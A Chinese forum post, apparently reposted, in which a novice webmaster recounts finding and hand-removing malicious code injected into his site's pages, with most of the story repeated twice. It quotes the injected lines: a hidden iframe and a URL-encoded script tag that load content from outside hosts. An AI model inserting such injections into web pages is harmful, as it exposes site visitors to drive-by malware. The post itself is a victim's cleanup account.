一个菜鸟清除网站木马的经历,小心,你也会有的.这是他真实的经历,享一下,特别注意加蓝字的地方.
三原色参考文章:网页木马的查杀方法(网络安全)
以下文章来自站长网:http://bbs.admin5.com/thread-115107-1-1.html
遭遇挂马,通宵达旦;感谢混蛋!
昨天发现网站有点不正常,还以为是空间商问题,找到卖空间给我的朋友打听,得知一“惊人”消息——你的网站可能被挂马了。顿时让我不知所措,哎!本来做站技术就不怎么样,怎么就偏偏选上我了呢?这可怎么办?
挂马之后,网站现象:
1、网站首页登陆代码没了,也就是不能直接从首页登陆、注册了。
2、由于登陆代码没了,从IE直接输入后台登陆地址,网页半天打不开,最后IE自动卡死。
3、第二天才发现进入网站后会弹出病毒报警。其他同上
咨询了下朋友相关解决办法,得知:一般的框架挂马杀不出来,要把整个网站下载下来一个个查文件,删代码。。。。听到这话我头都大了。。。那么多文件怎么查啊?况且自己连木马的代码长什么样都没见过,这方面的知识实在少的可怜。。。可惜朋友有事已经下线了,只剩我这丈二的和尚了。。哎!查吧……
木马会是什么样呢?…… 那个代码怎么查呢?……郁闷了半天!!!!!!
脑子突然闪个念头:先把网站下载下来用自己电脑上的杀毒软件杀杀再说。
——等把网站全部下到电脑上已经几个小时过去了。中间看了两部电影 :)
赶紧用瑞星开杀,几秒钟后弹出来检测到病毒文件“emp.asp",高兴的我在电脑前傻笑了好一会。当时还以为:原来就这样就把木马干掉了呢!在FTP上赶紧删掉了那个文件,又赶紧打开我的网站看看正常没有。。。结果一看还和之前没什么两样。哎!!~接着郁闷吧!
又是大概不到1个小时过去了,郁闷中突然又来了灵感,记得以前好象听人说过,网站被挂了马以后某些文件里会多出来一条代码。我就在想,那他如果是多出来的一条代码,应该会和正常的有点不一样吧?于是我又打开我的网站,看看会有什么发现?因为网站打开后,左上方会弹出来“发现可疑文件……”的弹窗。因为有经常修改网站代码和给网站加广告代码的经验,所以就把这个现象和弹窗代码视为一类,我想可能是首页文件被加了什么代码吧?于是就用编辑软件在FTP上打开了“index.html”,仔细看了好半天,谁知道在最后一行才发现有一段特别的代码“<iframe src=http://ad.2365.us/103/ width=100 height=0></iframe> <script src=http://%76%63%63%64%2E%63%6E></script>
”其中的“%76%63%63%64%2E%63%6”这一段是那鲜艳的红色,看着人起鸡皮!不过总算是有点进展。。。。赶紧删了那段代码,又赶紧打开我的网站,恩!这次没有弹出来病毒报警了。。。又以为 大 工 告成。。再次输入后台地址,晕死!IE又卡死了。。有了一次经验以后,这次我马上就想到,可能后台登陆的文件还存在这个该死的代码,于是按照之前的方法又在后台的几个文件里找到新的都是同一种样式的代码“<script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script>”再次输入后台地址,IE再次卡死。。。想哭!
这个东西到底怎么才搞的清啊??????????????当时恨不能把那个给我网站挂马的混蛋祖坟挖出来!
我实在搞不懂了,到底怎么才能彻底清除那些代码呢?当时,真的没辙了,脑子里不停的闪出抛弃网站的念头,我不想给来我网站的访客带去不必要的伤害,更不想让我的网站被列入神憎鬼厌的病毒网站之列;但是,毕竟这个网站我辛辛苦苦维持了快两年了,我真的舍不得啊!又想挖那个混蛋的祖坟了。。。。。。。
就在绝望的时候,我随手又打开一文件看了看,哇!原来其他文件也有同样的代码。。。规律是一样的,都在最下面一行。删除——覆盖,又检查其他文件,又删除又覆盖。。就这样折腾了10几个小时,几乎把FTP里每个文件夹里的文件都翻了一遍,不幸的是,我空间里有4,5套程序全都中了,一直弄到今天早上10点我才再次打开网站,。。。我的天哪!!!我亲爱的网站,她终于康复了。。。。不过,我却快倒下了。。。。盯着无数个文件10几个小时不休息,谁顶的住啊??????
最让我想说句“汗!”的是,直到我网站正常后,我才发现一个规律:原来被修改的文件在FTP里可以看到修改日期的。。。我的网站是1月22号也就前天被挂的马,修改过文件在FTP里后面都有显示修改日期的。。。这两天之间我没改过里面的文件,但却有1月22日、24日被修改的文件。。里面都有那些混蛋代码!我怎么搞完了才发现这个规律呢?真是让人哭笑不得!
经过这一夜与网站木马的奋战,让我长见识了,在骂一句那个给我网站挂马的混蛋垃圾的同时,我要感谢他一下,是他让我见识了传说中的“网站挂马”现象,让我了解了那么一点点怎么解决的办法。。。
快倒了,刚清理完那该死的木马。加班写了些乱字,大家不要笑我啊!从文章里应该能看的到我是个多么多么的菜鸟了。。。希望有高手来指点一下,应该怎么来彻底清除那些该死的代码啊?因为我怀疑我的网站还没清理干净。。。还有,怎么防止我的网站再次被挂马啊?
我可能是用的最笨的办法了。就这还是自己一夜奋战熬出来的啊!要是再来一次。。。我……
挂马之后,网站现象:
1、网站首页登陆代码没了,也就是不能直接从首页登陆、注册了。
2、由于登陆代码没了,从IE直接输入后台登陆地址,网页半天打不开,最后IE自动卡死。
3、第二天才发现进入网站后会弹出病毒报警。其他同上
咨询了下朋友相关解决办法,得知:一般的框架挂马杀不出来,要把整个网站下载下来一个个查文件,删代码。。。。听到这话我头都大了。。。那么多文件怎么查啊?况且自己连木马的代码长什么样都没见过,这方面的知识实在少的可怜。。。可惜朋友有事已经下线了,只剩我这丈二的和尚了。。哎!查吧……
木马会是什么样呢?…… 那个代码怎么查呢?……郁闷了半天!!!!!!
脑子突然闪个念头:先把网站下载下来用自己电脑上的杀毒软件杀杀再说。
——等把网站全部下到电脑上已经几个小时过去了。中间看了两部电影 :)
赶紧用瑞星开杀,几秒钟后弹出来检测到病毒文件“emp.asp",高兴的我在电脑前傻笑了好一会。当时还以为:原来就这样就把木马干掉了呢!在FTP上赶紧删掉了那个文件,又赶紧打开我的网站看看正常没有。。。结果一看还和之前没什么两样。哎!!~接着郁闷吧!
又是大概不到1个小时过去了,郁闷中突然又来了灵感,记得以前好象听人说过,网站被挂了马以后某些文件里会多出来一条代码。我就在想,那他如果是多出来的一条代码,应该会和正常的有点不一样吧?于是我又打开我的网站,看看会有什么发现?因为网站打开后,左上方会弹出来“发现可疑文件……”的弹窗。因为有经常修改网站代码和给网站加广告代码的经验,所以就把这个现象和弹窗代码视为一类,我想可能是首页文件被加了什么代码吧?于是就用编辑软件在FTP上打开了“index.html”,仔细看了好半天,谁知道在最后一行才发现有一段特别的代码“<iframe src=http://ad.2365.us/103/ width=100 height=0></iframe> <script src=http://%76%63%63%64%2E%63%6E></script>
”其中的“%76%63%63%64%2E%63%6”这一段是那鲜艳的红色,看着人起鸡皮!不过总算是有点进展。。。。赶紧删了那段代码,又赶紧打开我的网站,恩!这次没有弹出来病毒报警了。。。又以为 大 工 告成。。再次输入后台地址,晕死!IE又卡死了。。有了一次经验以后,这次我马上就想到,可能后台登陆的文件还存在这个该死的代码,于是按照之前的方法又在后台的几个文件里找到新的都是同一种样式的代码“<script src=http://%76%63%63%64%2E%63%6E></script><script src=http://%76%63%63%64%2E%63%6E></script>”再次输入后台地址,IE再次卡死。。。想哭!
这个东西到底怎么才搞的清啊??????????????当时恨不能把那个给我网站挂马的混蛋祖坟挖出来!
我实在搞不懂了,到底怎么才能彻底清除那些代码呢?当时,真的没辙了,脑子里不停的闪出抛弃网站的念头,我不想给来我网站的访客带去不必要的伤害,更不想让我的网站被列入神憎鬼厌的病毒网站之列;但是,毕竟这个网站我辛辛苦苦维持了快两年了,我真的舍不得啊!又想挖那个混蛋的祖坟了。。。。。。。
就在绝望的时候,我随手又打开一文件看了看,哇!原来其他文件也有同样的代码。。。规律是一样的,都在最下面一行。删除——覆盖,又检查其他文件,又删除又覆盖。。就这样折腾了10几个小时,几乎把FTP里每个文件夹里的文件都翻了一遍,不幸的是,我空间里有4,5套程序全都中了,一直弄到今天早上10点我才再次打开网站,。。。我的天哪!!!我亲爱的网站,她终于康复了。。。。不过,我却快倒下了。。。。盯着无数个文件10几个小时不休息,谁顶的住啊??????
最让我想说句“汗!”的是,直到我网站正常后,我才发现一个规律:原来被修改的文件在FTP里可以看到修改日期的。。。我的网站是1月22号也就前天被挂的马,修改过文件在FTP里后面都有显示修改日期的。。。这两天之间我没改过里面的文件,但却有1月22日、24日被修改的文件。。里面都有那些混蛋代码!我怎么搞完了才发现这个规律呢?真是让人哭笑不得!
经过这一夜与网站木马的奋战,让我长见识了,在骂一句那个给我网站挂马的混蛋垃圾的同时,我要感谢他一下,是他让我见识了传说中的“网站挂马”现象,让我了解了那么一点点怎么解决的办法。。。
快倒了,刚清理完那该死的木马。加班写了些乱字,大家不要笑我啊!从文章里应该能看的到我是个多么多么的菜鸟了。。。希望有高手来指点一下,应该怎么来彻底清除那些该死的代码啊?因为我怀疑我的网站还没清理干净。。。还有,怎么防止我的网站再次被挂马啊?
我可能是用的最笨的办法了。就这还是自己一夜奋战熬出来的啊!要是再来一次。。。我……
